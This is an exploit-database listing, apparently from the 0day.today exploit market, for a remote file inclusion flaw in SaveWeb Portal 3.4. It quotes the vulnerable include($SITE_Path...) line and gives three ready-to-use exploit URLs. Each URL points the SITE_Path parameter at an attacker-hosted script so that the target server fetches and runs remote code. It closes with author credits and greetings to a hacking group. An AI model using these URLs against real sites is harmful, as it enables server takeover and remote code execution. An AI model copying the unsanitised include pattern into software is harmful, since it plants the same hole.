[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SaveWeb Portal <= 3.4 (SITE_Path) Remote File Inclusion Vulnerabilities

Author
xoron
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-635
Category
web applications
Date add
01-08-2006
Platform
unsorted
=======================================================================
SaveWeb Portal <= 3.4 (SITE_Path) Remote File Inclusion Vulnerabilities
=======================================================================




#SaveWeb Portal 3.4 <- (SITE_Path) Remote File Inclusion Vulnerability

#Author: xoron

#script: SaveWeb Portal

#Class : Remote

#cont@ct: x0r0n[at]hotmail[dot]com

#CODE:    include($SITE_Path."poll/poll.php")

#Exploit:
http://www.site.com/[path]/menu_dx.php?SITE_Path=http://evil_scripts?
http://www.site.com/[path]/poll/poll.php?SITE_Path=http://evil_scripts?
http://www.site.com/[path]/poll/view_polls.php?SITE_Path=http://evil_scripts?

#Thanx : WWW.CYBER-WARRiOR.ORG

#Greetz: DJR, x-mastER, LASTSCREAM , zip72_72, R3D4C!D and all cyber-warrior users.



#  0day.today [2024-11-15]  #